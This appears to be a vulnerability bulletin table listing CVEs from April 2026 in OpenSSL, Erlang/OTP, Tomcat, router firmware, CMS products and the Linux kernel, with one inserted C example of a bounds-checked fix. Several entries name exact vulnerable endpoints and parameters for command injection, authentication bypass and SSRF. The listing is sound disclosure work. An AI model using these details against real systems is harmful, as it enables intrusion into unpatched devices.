| OpenSSL--OpenSSL | Issue summary: During processing of a crafted CMS EnvelopedData message with KeyAgreeRecipientInfo a NULL pointer dereference can happen. Impact summary: Applications that process attacker-controlled CMS data may crash before authentication or cryptographic operations occur resulting in Denial of Service. When a CMS EnvelopedData message that uses KeyAgreeRecipientInfo is processed, the optional parameters field of KeyEncryptionAlgorithmIdentifier is examined without checking for its presence. This results in a NULL pointer dereference if the field is missing. Applications and services that call CMS_decrypt() on untrusted input (e.g., S/MIME processing or CMS-based protocols) are vulnerable. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. | 2026-04-07 | not yet calculated | CVE-2026-28389 | OpenSSL Advisory 3.6.2 git commit 3.5.6 git commit 3.4.5 git commit 3.3.7 git commit 3.0.20 git commit |
| OpenSSL--OpenSSL | Issue summary: During processing of a crafted CMS EnvelopedData message with KeyTransportRecipientInfo a NULL pointer dereference can happen. Impact summary: Applications that process attacker-controlled CMS data may crash before authentication or cryptographic operations occur resulting in Denial of Service. When a CMS EnvelopedData message that uses KeyTransportRecipientInfo with RSA-OAEP encryption is processed, the optional parameters field of RSA-OAEP SourceFunc algorithm identifier is examined without checking for its presence. This results in a NULL pointer dereference if the field is missing. Applications and services that call CMS_decrypt() on untrusted input (e.g., S/MIME processing or CMS-based protocols) are vulnerable. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. | 2026-04-07 | not yet calculated | CVE-2026-28390 | OpenSSL Advisory 3.6.2 git commit 3.5.6 git commit 3.4.5 git commit 3.3.7 git commit 3.0.20 git commit |
| Japan Computer Emergency Response Team Coordination Center (JPCERT/CC)--Emocheck | Emocheck insecurely loads Dynamic Link Libraries (DLLs). If a crafted DLL file is placed in the same directory, arbitrary code may be executed with the privilege of the user invoking EmoCheck. | 2026-04-10 | not yet calculated | CVE-2026-28704 | https://www.jpcert.or.jp/press/2026/PR20260410.html https://github.com/JPCERTCC/EmoCheck/ https://jvn.jp/en/jp/JVN00263243/ |
| Erlang--OTP | Incorrect Authorization vulnerability in Erlang OTP (inets modules) allows unauthenticated access to CGI scripts protected by directory rules when served via script_alias. When script_alias maps a URL prefix to a directory outside DocumentRoot, mod_auth evaluates directory-based access controls against the DocumentRoot-relative path while mod_cgi executes the script at the ScriptAlias-resolved path. This path mismatch allows unauthenticated access to CGI scripts that directory rules were meant to protect. This vulnerability is associated with program files lib/inets/src/http_server/mod_alias.erl, lib/inets/src/http_server/mod_auth.erl, and lib/inets/src/http_server/mod_cgi.erl. This issue affects OTP from OTP 17.0 until OTP 28.4.2, 27.3.4.10 and 26.2.5.19 corresponding to inets from 5.10 until 9.6.2, 9.3.2.4 and 9.1.0.6. | 2026-04-07 | not yet calculated | CVE-2026-28808 | https://github.com/erlang/otp/security/advisories/GHSA-3vhp-h532-mc3f https://cna.erlef.org/cves/CVE-2026-28808.html https://osv.dev/vulnerability/EEF-CVE-2026-28808 https://www.erlang.org/doc/system/versions.html#order-of-versions https://github.com/erlang/otp/commit/8fc71ac6af4fbcc54103bec2983ef22e82942688 https://github.com/erlang/otp/commit/9dfa0c51eac97866078e808dec2183cb7871ff7c |
| Erlang--OTP | Generation of Predictable Numbers or Identifiers vulnerability in Erlang/OTP kernel (inet_res, inet_db modules) allows DNS Cache Poisoning. The built-in DNS resolver (inet_res) uses a sequential, process-global 16-bit transaction ID for UDP queries and does not implement source port randomization. Response validation relies almost entirely on this ID, making DNS cache poisoning practical for an attacker who can observe one query or predict the next ID. This conflicts with RFC 5452 recommendations for mitigating forged DNS answers. inet_res is intended for use in trusted network environments and with trusted recursive resolvers. Earlier documentation did not clearly state this deployment assumption, which could lead users to deploy the resolver in environments where spoofed DNS responses are possible. This vulnerability is associated with program files lib/kernel/src/inet_db.erl and lib/kernel/src/inet_res.erl. This issue affects OTP from OTP 17.0 until OTP 28.4.2, 27.3.4.10 and 26.2.5.19 corresponding to kernel from 3.0 until 10.6.2, 10.2.7.4 and 9.2.4.11. | 2026-04-07 | not yet calculated | CVE-2026-28810 | https://github.com/erlang/otp/security/advisories/GHSA-v884-5jg5-whj8 https://cna.erlef.org/cves/CVE-2026-28810.html https://osv.dev/vulnerability/EEF-CVE-2026-28810 https://www.erlang.org/doc/system/versions.html#order-of-versions https://github.com/erlang/otp/commit/36f23c9d2cc54afe83671dd7343596d7972839a5 https://github.com/erlang/otp/commit/dd15e8eb03548c5e55e9915f0e91389ec6bad9fd https://github.com/erlang/otp/commit/b057a9d995017b1be50d6dc02edd52382f3231b8 |
| Apache Software Foundation--Apache Tomcat | Configured cipher preference order not preserved vulnerability in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.16 through 11.0.18, from 10.1.51 through 10.1.52, from 9.0.114 through 9.0.115. Users are recommended to upgrade to version 11.0.20, 10.1.53 or 9.0.116, which fix the issue. | 2026-04-09 | not yet calculated | CVE-2026-29129 | https://lists.apache.org/thread/r4h1t6f8xhxsxfm6c2z5cprolsosho3f |
| Apache Software Foundation--Apache Tomcat | CLIENT_CERT authentication does not fail as expected for some scenarios when soft fail is disabled vulnerability in Apache Tomcat, Apache Tomcat Native. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.18, from 10.1.0-M7 through 10.1.52, from 9.0.83 through 9.0.115; Apache Tomcat Native: from 1.1.23 through 1.1.34, from 1.2.0 through 1.2.39, from 1.3.0 through 1.3.6, from 2.0.0 through 2.0.13. Users are recommended to upgrade to version Tomcat Native 1.3.7 or 2.0.14 and Tomcat 11.0.20, 10.1.53 and 9.0.116, which fix the issue. | 2026-04-09 | not yet calculated | CVE-2026-29145 | https://lists.apache.org/thread/yz5fxmhd2j43wgqykssdo7kltws57jfz |
| Apache Software Foundation--Apache Tomcat | Padding Oracle vulnerability in Apache Tomcat's EncryptInterceptor with default configuration. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.18, from 10.0.0-M1 through 10.1.52, from 9.0.13 through 9.0.115, from 8.5.38 through 8.5.100, from 7.0.100 through 7.0.109. Users are recommended to upgrade to version 11.0.19, 10.1.53 and 9.0.116, which fix the issue. | 2026-04-09 | not yet calculated | CVE-2026-29146 | https://lists.apache.org/thread/lzt04z2pb3dc5tk85obn80xygw3z1p0w |
| n/a--n/a | PHP-MYSQL-User-Login-System v1.0 was discovered to contain a SQL injection vulnerability via the username parameter at login.php. | 2026-04-10 | not yet calculated | CVE-2026-29861 | https://github.com/amanyadav78/CVE-2026-29861 |
| Entechtaiwan[.]com -- PowerStrip | The pstrip64.sys driver in EnTech Taiwan PowerStrip <=3.90.736 allows local users to escalate privileges to SYSTEM via a crafted IOCTL request enabling unprivileged users to map arbitrary physical memory into their address space and modify critical kernel structures. | 2026-04-09 | not yet calculated | CVE-2026-29923 | https://entechtaiwan.com/util/ps.shtm https://packetstorm.news/files/id/218394/ |
| n/a--OpenAirInterface | OpenAirInterface Version 2.2.0 has a Buffer Overflow vulnerability in processing an UplinkNASTransport containing an Authentication Response containing a NAS PDU with an oversize response (for example, 100 bytes). The response is decoded by the AMF and passed to the AUSF component for verification. The AUSF crashes on receiving this oversize response. This can prohibit users from further registration and verification and can cause Denial of Service (DoS). | 2026-04-08 | not yet calculated | CVE-2026-30075 | https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-ausf/-/issues?show=eyJpaWQiOiI2IiwiZnVsbF9wYXRoIjoib2FpL2NuNWcvb2FpLWNuNWctYXVzZiIsImlkIjo1NDE5fQ%3D%3D https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-ausf/-/issues/6 |
| n/a--OpenAirInterface | OpenAirInterface V2.2.0 AMF crashes when it receives an NGAP message with an invalid procedure code or invalid PDU type, for example when the message specification requires InitiatingMessage but the message is sent as successfulOutcome. | 2026-04-06 | not yet calculated | CVE-2026-30078 | https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/issues/74 https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/merge_requests/414 |
| n/a--OpenAirInterface | In OpenAirInterface V2.2.0 AMF, out-of-sequence messages cause an incorrect state transition during the UE registration procedure. This allows authentication to be bypassed completely. If a SecurityModeComplete message is sent after InitialUERegistration, a registration reject is received followed by a registration accept. This leads to the UE being registered without proper authentication. | 2026-04-07 | not yet calculated | CVE-2026-30079 | https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/issues/77 |
| n/a--OpenAirInterface | OpenAirInterface v2.2.0 accepts Security Mode Complete without any integrity protection. The configuration supports the integrity algorithms NIA1 and NIA2, but if a UE sends an initial registration request with only the security capability IA0, OpenAirInterface accepts it and proceeds. This downgraded security context can lead to the possibility of a replay attack. | 2026-04-08 | not yet calculated | CVE-2026-30080 | https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/issues/78 |
| chartbrew--chartbrew | Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. Prior to 4.8.5, Chartbrew allows authenticated users to create API data connections with arbitrary URLs. The server fetches these URLs using request-promise without any IP address validation, enabling Server-Side Request Forgery attacks against internal networks and cloud metadata endpoints. This vulnerability is fixed in 4.8.5. | 2026-04-10 | not yet calculated | CVE-2026-30232 | https://github.com/chartbrew/chartbrew/security/advisories/GHSA-p4rg-967r-w4cv https://github.com/chartbrew/chartbrew/commit/9c4a7e2b02acb25f0782bd4ac1f16407d59c2df1 |
| n/a--Daylight Studio FuelCMS | Daylight Studio FuelCMS v1.5.2 was discovered to contain an authenticated remote code execution (RCE) vulnerability in the Blocks module. | 2026-04-07 | not yet calculated | CVE-2026-30460 | https://github.com/daylightstudio/FUEL-CMS/ http://daylight.com http://fuelcms.com https://pentest-tools.com/PTT-2025-027-Improper-Authorization.pdf |
| Ms4w[.]com -- GatewayGeo Mapserver | A Dynamic-link Library Injection vulnerability in GatewayGeo MapServer for Windows version 5 allows attackers to escalate privileges via a crafted executable. | 2026-04-09 | not yet calculated | CVE-2026-30478 | https://ms4w.com https://github.com/penjaminTester/Research/tree/main/CVE-2026-30478 |
| Ms4w[.]com -- GatewayGeo Mapserver | A Dynamic-link Library Injection vulnerability in OSGeo Project MapServer before v8.0 allows attackers to execute arbitrary code via a crafted executable. | 2026-04-09 | not yet calculated | CVE-2026-30479 | https://mapserver.org/index.html https://github.com/penjaminTester/Research/tree/main/CVE-2026-30479 |
| Aziot[.]life -- AZIOT 1 Node Smart Switch | An information disclosure vulnerability exists in AZIOT 1 Node Smart Switch (16amp) - WiFi/Bluetooth Enabled, Software Version: 1.1.9 due to improper access control on the UART debug interface. An attacker with physical access can connect to the UART interface and obtain sensitive information from the serial console without authentication. | 2026-04-06 | not yet calculated | CVE-2026-30613 | http://aziot.com https://github.com/dumbermore/tuya/blob/main/README.md |
| TP-Link Systems Inc.--AX53 v1.0 | A stack-based buffer overflow in the tmpServer module of TP-Link Archer AX53 v1.0 allows an authenticated adjacent attacker to trigger a segmentation fault and potentially execute arbitrary code via a specially crafted configuration file. Successful exploitation may cause a crash and could allow arbitrary code execution, enabling modification of device state, exposure of sensitive data, or further compromise of device integrity. This issue affects AX53 v1.0: before 1.7.1 Build 20260213. | 2026-04-08 | not yet calculated | CVE-2026-30814 | https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firmware https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware https://talosintelligence.com/vulnerability_reports/ https://www.tp-link.com/us/support/faq/5055/ |
| TP-Link Systems Inc.--AX53 v1.0 | An OS command injection vulnerability in the OpenVPN module of TP-Link Archer AX53 v1.0 allows an authenticated adjacent attacker to execute system commands when a specially crafted configuration file is processed due to insufficient input validation. Successful exploitation may allow modification of configuration files, disclosure of sensitive information, or further compromise of device integrity. This issue affects AX53 v1.0: before 1.7.1 Build 20260213. | 2026-04-08 | not yet calculated | CVE-2026-30815 | https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firmware https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware https://talosintelligence.com/vulnerability_reports/ https://www.tp-link.com/us/support/faq/5055/ |
| TP-Link Systems Inc.--AX53 v1.0 | An external control of configuration vulnerability in the OpenVPN module of TP-Link AX53 v1.0 allows an authenticated adjacent attacker to read arbitrary files when a malicious configuration file is processed. Successful exploitation may allow unauthorized access to arbitrary files on the device, potentially exposing sensitive information. This issue affects AX53 v1.0: before 1.7.1 Build 20260213. | 2026-04-08 | not yet calculated | CVE-2026-30816 | https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firmware https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware https://talosintelligence.com/vulnerability_reports/ https://www.tp-link.com/us/support/faq/5055/ |
| TP-Link Systems Inc.--AX53 v1.0 | An external configuration control vulnerability in the OpenVPN module of TP-Link AX53 v1.0 allows an authenticated adjacent attacker to read arbitrary files when a malicious configuration file is processed. Successful exploitation may allow unauthorized access to arbitrary files on the device, potentially exposing sensitive information. This issue affects AX53 v1.0: before 1.7.1 Build 20260213. | 2026-04-08 | not yet calculated | CVE-2026-30817 | https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firmware https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware https://talosintelligence.com/vulnerability_reports/ https://www.tp-link.com/us/support/faq/5055/ |
| TP-Link Systems Inc.--AX53 v1.0 | An OS command injection vulnerability in the dnsmasq module of TP-Link Archer AX53 v1.0 allows an authenticated adjacent attacker to execute arbitrary code when a specially crafted configuration file is processed due to insufficient input validation. Successful exploitation may allow the attacker to modify device configuration, access sensitive information, or further compromise system integrity. This issue affects AX53 v1.0: before 1.7.1 Build 20260213. | 2026-04-08 | not yet calculated | CVE-2026-30818 | https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firmware https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware https://talosintelligence.com/vulnerability_reports/ https://www.tp-link.com/us/support/faq/5055/ |
| n/a--n/a | A Server-Side Request Forgery (SSRF) vulnerability exists in the Print Format functionality of ERPNext v16.0.1 and Frappe Framework v16.1.1, where user-supplied HTML is insufficiently sanitized before being rendered into PDF. When generating PDFs from user-controlled HTML content, the application allows the inclusion of HTML elements such as <iframe> that reference external resources. The PDF rendering engine automatically fetches these resources on the server side. An attacker can abuse this behavior to force the server to make arbitrary HTTP requests to internal services, including cloud metadata endpoints, potentially leading to sensitive information disclosure. | 2026-04-08 | not yet calculated | CVE-2026-31017 | http://frappe.com https://github.com/PhDg1410/CVE/tree/main/CVE-2026-31017 |
| n/a--n/a | A vulnerability was identified in stata-mcp prior to v1.13.0 where insufficient validation of user-supplied Stata do-file content can lead to command execution. | 2026-04-08 | not yet calculated | CVE-2026-31040 | https://github.com/SepineTam/stata-mcp/issues/20 https://github.com/SepineTam/stata-mcp/pull/21 https://github.com/SepineTam/stata-mcp/commit/52413ce https://github.com/SepineTam/stata-mcp/releases/tag/v1.13.0 |
| n/a--n/a | A double free vulnerability exists in librz/bin/format/le/le.c in the function le_load_fixup_record(). When processing malformed or circular LE fixup chains, relocation entries may be freed multiple times during error handling. A specially crafted LE binary can trigger heap corruption and cause the application to crash, resulting in a denial-of-service condition. An attacker with a crafted binary could cause a denial of service when the tool is integrated on a service pipeline. | 2026-04-06 | not yet calculated | CVE-2026-31053 | https://github.com/rizinorg/rizin/issues/5753 https://github.com/rizinorg/rizin/pull/5795 |
| n/a-- Aggressive HiPER Router 1200GW | UTT Aggressive HiPER 1200GW v2.5.3-170306 was discovered to contain a buffer overflow in the timeRangeName parameter of the formConfigDnsFilterGlobal function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-04-06 | not yet calculated | CVE-2026-31058 | https://github.com/zxq0408/Vul202601/blob/main/2.md |
| n/a-- Aggressive HiPER Router 520W | A remote command execution (RCE) vulnerability in the /goform/formDia component of UTT Aggressive HiPER 520W v3v1.7.7-180627 allows attackers to execute arbitrary commands via a crafted string. | 2026-04-06 | not yet calculated | CVE-2026-31059 | https://github.com/zxq0408/Vul202601/blob/main/9.md |
| n/a-- Aggressive HiPER Router 810G | UTT Aggressive HiPER 810G v3v1.7.7-171114 was discovered to contain a buffer overflow in the notes parameter of the formGroupConfig function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-04-06 | not yet calculated | CVE-2026-31060 | https://github.com/zxq0408/Vul202601/blob/main/5.md |
| n/a-- Aggressive HiPER Router 810G | UTT Aggressive HiPER 810G v3v1.7.7-171114 was discovered to contain a buffer overflow in the timestart parameter of the ConfigAdvideo function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-04-06 | not yet calculated | CVE-2026-31061 | https://github.com/zxq0408/Vul202601/blob/main/1.md |
| n/a-- Aggressive HiPER Router 510W | UTT Aggressive 520W v3v1.7.7-180627 was discovered to contain a buffer overflow in the filename parameter of the formFtpServerDirConfig function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-04-06 | not yet calculated | CVE-2026-31062 | https://github.com/zxq0408/Vul202601/blob/main/7.md |
| n/a-- Aggressive HiPER Router 1200GW | UTT Aggressive HiPER 1200GW v2.5.3-170306 was discovered to contain a buffer overflow in the pools parameter of the formArpBindConfig function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-04-06 | not yet calculated | CVE-2026-31063 | https://github.com/zxq0408/Vul202601/blob/main/4.md |
| n/a-- Aggressive HiPER Router 520W | UTT Aggressive 520W v3v1.7.7-180627 was discovered to contain a buffer overflow in the addCommand parameter of the formConfigCliForEngineerOnly function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-04-06 | not yet calculated | CVE-2026-31065 | https://github.com/zxq0408/Vul202601/blob/main/8.md |
| n/a-- Aggressive HiPER Router 810G | UTT Aggressive HiPER 810G v3v1.7.7-171114 was discovered to contain a buffer overflow in the selDateType parameter of the formTaskEdit function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-04-06 | not yet calculated | CVE-2026-31066 | https://github.com/zxq0408/Vul202601/blob/main/6.md |
| n/a-- UTT Aggressive 520W | A remote command execution (RCE) vulnerability in the /goform/formReleaseConnect component of UTT Aggressive 520W v3v1.7.7-180627 allows attackers to execute arbitrary commands via a crafted string. | 2026-04-06 | not yet calculated | CVE-2026-31067 | https://github.com/zxq0408/Vul202601/blob/main/10.md |
| n/a-- Kaleris YMS | Incorrect access control in Kaleris YMS v7.2.2.1 allows authenticated attackers with only the shipping/receiving role to view the truck's dashboard resources. | 2026-04-06 | not yet calculated | CVE-2026-31150 | https://kaleris.com/solutions/yard-management/ https://github.com/Henkel-CyberVM/CVEs/tree/main/CVE-2026-31150 |
| n/a-- Kaleris YMS | An issue in the login mechanism of Kaleris YMS v7.2.2.1 allows attackers to bypass login verification to access the application's resources. | 2026-04-06 | not yet calculated | CVE-2026-31151 | https://kaleris.com/solutions/yard-management/ https://github.com/Henkel-CyberVM/CVEs/tree/main/CVE-2026-31151 |
| Bynder[.]com -- Bynder v0.1.394 | A stored cross-site scripting (XSS) vulnerability in Bynder v0.1.394 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. | 2026-04-06 | not yet calculated | CVE-2026-31153 | https://www.bynder.com/en/ https://github.com/Henkel-CyberVM/CVEs/tree/main/CVE-2026-31153 |
| Totolink[.]net -- A3300R router | An issue was discovered in ToToLink A3300R firmware v17.0.0cu.557_B20221024 allowing attackers to execute arbitrary commands via the stun-pass parameter to /cgi-bin/cstecgi.cgi. | 2026-04-09 | not yet calculated | CVE-2026-31170 | https://github.com/Svigo-o/TOTOLINK-Vul/tree/main/totolink-a3300r-stun-pass-cmd-injection |
| Altenar[.]com -- Sportsbook Software Platform SB2 v.2.0 | Cross Site Scripting vulnerability in Altenar Sportsbook Software Platform (SB2) v.2.0 allows a remote attacker to obtain sensitive information and execute arbitrary code via the URL parameter | 2026-04-10 | not yet calculated | CVE-2026-31262 | https://github.com/nikolas-ch/CVEs/tree/main/Altenar_SportsBook_Platform_SB2/ORtoXSS https://github.com/nikolas-ch/CVEs/blob/main/Altenar_SportsBook_Platform_SB2/ORtoXSS/ORtoXSS.txt |
| n/a--n/a | megagao production_ssm v1.0 contains an authorization bypass vulnerability in the user addition functionality. The insert() method in UserController.java lacks authentication checks, allowing unauthenticated attackers to create super administrator accounts by directly accessing the /user/insert endpoint. This leads to complete system compromise. | 2026-04-07 | not yet calculated | CVE-2026-31271 | https://github.com/clockw1se0v0/Vul/blob/main/production_ssm/Unauthorized.md |
| n/a--n/a | MRCMS 3.1.2 contains an access control vulnerability. The save() method in src/main/java/org/marker/mushroom/controller/UserController.java lacks proper authorization validation, enabling direct addition of super administrator accounts without authentication. | 2026-04-07 | not yet calculated | CVE-2026-31272 | https://github.com/clockw1se0v0/Vul/blob/main/MRCMS/Unauthorized.md |
| n/a-- Feehi CMS | An authenticated stored cross-site scripting (XSS) vulnerability in the creation/editing module of Feehi CMS v2.1.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Content field. | 2026-04-06 | not yet calculated | CVE-2026-31313 | http://feehi.com https://github.com/liufee/cms/issues/80 |
| n/a-- Feehi CMS | An authenticated stored cross-site scripting (XSS) vulnerability in Feehi CMS v2.1.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Page Sign parameter. | 2026-04-06 | not yet calculated | CVE-2026-31350 | https://github.com/liufee/cms https://github.com/liufee/cms/issues/82 |
| n/a-- Feehi CMS | An authenticated stored cross-site scripting (XSS) vulnerability in the creation/editing module of Feehi CMS v2.1.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Title parameter. | 2026-04-06 | not yet calculated | CVE-2026-31351 | https://github.com/liufee/cms https://github.com/liufee/cms/issues/81 |
| n/a-- Feehi CMS | An authenticated stored cross-site scripting (XSS) vulnerability in the Role Management module of Feehi CMS v2.1.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Role Name parameter. | 2026-04-06 | not yet calculated | CVE-2026-31352 | https://github.com/liufee/cms https://github.com/liufee/cms/issues/83 |
| n/a-- Feehi CMS | An authenticated stored cross-site scripting (XSS) vulnerability in the Category module of Feehi CMS v2.1.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Name parameter. | 2026-04-06 | not yet calculated | CVE-2026-31353 | https://github.com/liufee/cms https://github.com/liufee/cms/issues/84 |
| n/a-- Feehi CMS | Multiple authenticated stored cross-site scripting (XSS) vulnerabilities in the Permissions module of Feehi CMS v2.1.1 allow attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Group, Category or Description parameters. | 2026-04-06 | not yet calculated | CVE-2026-31354 | https://github.com/liufee/cms https://github.com/liufee/cms/issues/85 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: dvb-net: fix OOB access in ULE extension header tables The ule_mandatory_ext_handlers[] and ule_optional_ext_handlers[] tables in handle_one_ule_extension() are declared with 255 elements (valid indices 0-254), but the index htype is derived from network-controlled data as (ule_sndu_type & 0x00FF), giving a range of 0-255. When htype equals 255, an out-of-bounds read occurs on the function pointer table, and the OOB value may be called as a function pointer. Add a bounds check on htype against the array size before either table is accessed. Out-of-range values now cause the SNDU to be discarded. | 2026-04-06 | not yet calculated | CVE-2026-31405 | https://git.kernel.org/stable/c/29ef43ceb121d67b87f4cbb08439e4e9e732eff8 https://git.kernel.org/stable/c/1a6da3dbb9985d00743073a1cc1f96e59f5abc30 https://git.kernel.org/stable/c/145e50c2c700fa52b840df7bab206043997dd18e https://git.kernel.org/stable/c/8bde543d2a5f935ba2a6a6325a2e02f8a9256fbe https://git.kernel.org/stable/c/f2b65dcb78c8990e4c68a906627433be1fe38a92 https://git.kernel.org/stable/c/24d87712727a5017ad142d63940589a36cd25647 |
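The dvb-net entry above comes down to one missing comparison: the low byte of a packet-supplied 16-bit SNDU type spans 0..255, but the handler tables have 255 slots, so index 255 reads one function pointer past the end and calls it. The block below is an added example written for this page, not the kernel's code, showing the hardened dispatch the fix describes: the index is checked against the table size before the table is touched, and out-of-range or unregistered types cause the SNDU to be discarded. The names `ule_dispatch_ext`, `ule_handle_padding`, the `ULE_DISCARD` value and the sample packet bytes are assumptions made for the illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Added example, not the kernel's handle_one_ule_extension(): a 255-entry
 * table of handler function pointers indexed by the low byte of a
 * network-supplied SNDU type. */
#define ULE_NUM_HANDLERS 255          /* valid indices 0..254 */
#define ULE_DISCARD      (-1)         /* hypothetical "drop this SNDU" code */

typedef int (*ule_ext_handler)(const uint8_t *hdr, size_t len);

/* Hypothetical handler: a padding extension that consumes nothing. */
static int ule_handle_padding(const uint8_t *hdr, size_t len)
{
    (void)hdr; (void)len;
    return 0;
}

/* Only entry 0 is populated here; unregistered entries stay NULL. */
static const ule_ext_handler ule_mandatory_ext_handlers[ULE_NUM_HANDLERS] = {
    [0] = ule_handle_padding,
};

/* Hardened dispatch: (sndu_type & 0xFF) ranges 0..255, but the table has
 * 255 entries, so 255 must be rejected before it is used as an index.
 * Returns the handler's result, or ULE_DISCARD when the SNDU must be dropped. */
int ule_dispatch_ext(uint16_t sndu_type, const uint8_t *hdr, size_t len)
{
    unsigned int htype = sndu_type & 0x00FF;

    if (htype >= ULE_NUM_HANDLERS)
        return ULE_DISCARD;           /* out of range: would read past the table */

    ule_ext_handler h = ule_mandatory_ext_handlers[htype];
    if (h == NULL)
        return ULE_DISCARD;           /* no handler registered for this type */

    return h(hdr, len);
}

int main(void)
{
    static const uint8_t pkt[4] = { 0 };   /* constructed sample header bytes */
    printf("type 0x0000 -> %d\n", ule_dispatch_ext(0x0000, pkt, sizeof pkt));
    printf("type 0x00FF -> %d (discarded)\n", ule_dispatch_ext(0x00FF, pkt, sizeof pkt));
    return 0;
}
```

The check is deliberately written as `htype >= ULE_NUM_HANDLERS` rather than `htype == 255` so that it stays correct if the table is ever resized.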
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfrm: Fix work re-schedule after cancel in xfrm_nat_keepalive_net_fini() After cancel_delayed_work_sync() is called from xfrm_nat_keepalive_net_fini(), xfrm_state_fini() flushes remaining states via __xfrm_state_delete(), which calls xfrm_nat_keepalive_state_updated() to re-schedule nat_keepalive_work. The following is a simple race scenario: cpu0 cpu1 cleanup_net() [Round 1] ops_undo_list() xfrm_net_exit() xfrm_nat_keepalive_net_fini() cancel_delayed_work_sync(nat_keepalive_work); xfrm_state_fini() xfrm_state_flush() xfrm_state_delete(x) __xfrm_state_delete(x) xfrm_nat_keepalive_state_updated(x) schedule_delayed_work(nat_keepalive_work); rcu_barrier(); net_complete_free(); net_passive_dec(net); llist_add(&net->defer_free_list, &defer_free_list); cleanup_net() [Round 2] rcu_barrier(); net_complete_free() kmem_cache_free(net_cachep, net); nat_keepalive_work() // on freed net To prevent this, cancel_delayed_work_sync() is replaced with disable_delayed_work_sync(). | 2026-04-06 | not yet calculated | CVE-2026-31406 | https://git.kernel.org/stable/c/32d0f44c2f14d60fe8e920e69a28c11051543ec1 https://git.kernel.org/stable/c/2255ed6adbc3100d2c4a83abd9d0396d04b87792 https://git.kernel.org/stable/c/21f2fc49ca6faa393c31da33b8a4e6c41fc84c13 https://git.kernel.org/stable/c/daf8e3b253aa760ff9e96c7768a464bc1d6b3c90 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: conntrack: add missing netlink policy validations Hyunwoo Kim reports out-of-bounds access in sctp and ctnetlink. These attributes are used by the kernel without any validation. Extend the netlink policies accordingly. Quoting the reporter: nlattr_to_sctp() assigns the user-supplied CTA_PROTOINFO_SCTP_STATE value directly to ct->proto.sctp.state without checking that it is within the valid range. [..] and: ... with exp->dir = 100, the access at ct->master->tuplehash[100] reads 5600 bytes past the start of a 320-byte nf_conn object, causing a slab-out-of-bounds read confirmed by UBSAN. | 2026-04-06 | not yet calculated | CVE-2026-31407 | https://git.kernel.org/stable/c/0fbae1e74493d5a160a70c51aeba035d8266ea7d https://git.kernel.org/stable/c/f900e1d77ee0ef87bfb5ab3fe60f0b3d8ad5ba05 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: SCO: Fix use-after-free in sco_recv_frame() due to missing sock_hold sco_recv_frame() reads conn->sk under sco_conn_lock() but immediately releases the lock without holding a reference to the socket. A concurrent close() can free the socket between the lock release and the subsequent sk->sk_state access, resulting in a use-after-free. Other functions in the same file (sco_sock_timeout(), sco_conn_del()) correctly use sco_sock_hold() to safely hold a reference under the lock. Fix by using sco_sock_hold() to take a reference before releasing the lock, and adding sock_put() on all exit paths. | 2026-04-06 | not yet calculated | CVE-2026-31408 | https://git.kernel.org/stable/c/b0a7da0e3f7442545f071499beb36374714bb9de https://git.kernel.org/stable/c/45aaca995e4a7a05b272a58e7ab2fff4f611b8f1 https://git.kernel.org/stable/c/108b81514d8f2535eb16651495cefb2250528db3 https://git.kernel.org/stable/c/7197462e90b8ce15caa1ae15d4bc2bb8cd21b11e https://git.kernel.org/stable/c/e76e8f0581ef555eacc11dbb095e602fb30a5361 https://git.kernel.org/stable/c/598dbba9919c5e36c54fe1709b557d64120cb94b |
